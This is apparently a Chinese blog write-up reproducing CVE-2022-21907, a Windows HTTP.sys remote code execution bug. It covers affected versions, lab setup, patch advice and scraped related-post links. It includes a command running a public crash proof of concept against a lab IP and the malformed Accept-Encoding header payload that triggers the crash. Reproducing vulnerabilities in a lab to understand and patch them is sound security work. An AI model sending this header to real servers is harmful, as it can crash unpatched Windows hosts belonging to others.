目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

下载:

开启IIS:

0x06 漏洞复现:

利用POC:

0x07 流量分析:

客户端:

0x08 修复建议:


0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Microsoft Windows HTTP 协议栈(HTTP.sys)是Windows操作系统中处理HTTP请求的内核驱动程序,常见于Web浏览器与 Web 服务器之间的通信,,以及Internet Information Services (IIS)中。

由于该漏洞危害极大且影响范围甚广,而目前官方已发布修复补丁,建议广大用户及时更新补丁,并且做好资产自查以及预防工作,以免遭受黑客攻击。

0x03 漏洞概述:

Microsoft Windows HTTP 协议栈远程代码执行漏洞,漏洞编号为CVE-2022-21907,漏洞等级:严重,漏洞评分:9.8。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞。

0x04 影响版本:

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

0x05 环境搭建:

下载:

文件名:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso

BT链接:

magnet:?xt=urn:btih:38A3327AC2E4D57BA0E3ECC421588FA6B352C967&dn=cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso&xl=5424910336

开启IIS:

打开控制面板—启用关闭Windows功能—开启lnternet Information Services& Internet lnformation Services可承载的Web核心

0x06 漏洞复现:

利用POC:

(https://github.com/p0dalirius/CVE-2022-21907-http.sys)

Python CVE-2022-21907_http.sys_crash.py -t 192.168.16.132

0x07 流量分析:

客户端:

请求Accept-Encoding:

AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,

0x08 修复建议:

微软官方目前已修复该漏洞,并发布了相关安全补丁,建议用户尽快安装补丁。

下载链接:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907

CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现相关推荐

  1. 服务器2008操作系统漏洞,【操作系统安全漏洞 】解决CVE-2017-11780:Microsoft Windows SMB Server远程代码执行漏洞...

    一.漏洞描述 2017年10月10日,微软漏洞补丁日修复了多个安全漏洞,其中一个为Microsoft WindowsSMB Server远程执行代码漏洞,根据官方描述该漏洞如果被成功利用,远程攻击者可 ...

  2. CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)

    文章目录 免责声明 前言 一.漏洞简介 风险等级评判 二.影响版本 office版本 三.漏洞复现 复现环境 工具 使用方法 利用 第一种 第二种 防范避免 结尾 参考 免责声明 本文章仅供学习和研究 ...

  3. CVE-2020-16838 Windows tcp/ip 远程代码执行漏洞复现

    漏洞环境 攻击机:windows 10 (python版本:3.7 ,安装了scapy依赖) 受害机环境:windows10 1909 受害机网络开启ipv6支持 打开cmd输入ipconfig查看受 ...

  4. 微软多个 Windows 系统存在远程代码执行漏洞(ICMP协议)(MPS-2023-1376)

    漏洞描述 Internet Control Message Protocol (ICMP) 协议是TCP/IP协议簇的一个子协议,用于在IP主机.路由器之间传递控制消息.raw socket 是一种网 ...

  5. windows server 2012 远程连不上_CVE20201350 | Windows DNS Server远程代码执行漏洞通告

    0x00 漏洞概述 CVE   ID CVE-2020-1350 时     间 2020-07-15 类     型 RCE 等     级 严重 远程利用 是 影响范围 0x01 漏洞详情 微软于 ...

  6. CVE-2021-1675: Windows Print Spooler远程代码执行漏洞

    ** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日 ...

  7. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  8. Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)

    ​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中. 微软在2021年6月的安全更 ...

  9. rmi远程代码执行漏洞_微软 Windows DNS Server 远程代码执行漏洞

    安全预警 漏洞:微软 Windows DNS Server 远程代码执行漏洞漏洞编号:CVE-2020-1350威胁程度:高影响范围: Windows Server 2008 for 32-bit S ...

最新文章

  1. 服务器虚拟机怎么控制,虚拟机可以控制云服务器吗
  2. 没学过python、但是还是有公司要-想转行,是要入坑Python还是Java?这问题还用问?...
  3. 使用opencv和python进行智能图像处理_使用OpenCV在Python中进行图像处理
  4. 带分页功能的SSH整合,DAO层经典封装
  5. sql server死锁_了解SQL Server死锁图的图形表示
  6. MacPE+WinPE-黑苹果之路
  7. Flowable官方指定中国社区成立了
  8. 《模拟电子技术》–童诗白
  9. 在虚幻引擎5中构建你的首款游戏 - 03 - 模型和材质蓝图
  10. 工业4.0时代,企业如何提升设备管理效率?
  11. 入门OJ 3168【等式】
  12. virtualbox 清理磁盘占用空间
  13. PT站的分享精神,我所向往的PT分享模式(原创)
  14. Gossiping --解题报告
  15. 日本研发5nm取得重大进展,和美国远离EUV,ASML陷入众叛亲离境地
  16. 20191219 门面设计模式
  17. ISD1700系列语音芯片使用注意事项
  18. 华为服务器主板芯片组,华为鲲鹏服务器主板正式发布!打造最强算力 世界最强!...
  19. python 数据挖掘 培训视频下利用Pandas进行数据清洗
  20. Magisk搞机器记录(小米Mix3)

热门文章

  1. OSChina 周四乱弹 —— 如果你追到我,我就和你……
  2. I-P-B frame简介
  3. 最佳情侣身高差 (10 分)
  4. 一分钟实现生成自定义的连续时间格式字符
  5. 计算机如何修改任务管理器,win7如何更改任务管理器快捷键_win7更改任务管理器快捷键的教程...
  6. 聚类评价指标(轮廓系数 Silhouette coefficient)
  7. UE4蓝图流程控制:FlipFlop节点、DoOnce节点的使用
  8. vue搜索关键字标红
  9. css中outline,css中outline的解析(附示例)
  10. 华硕x550JK,i5改进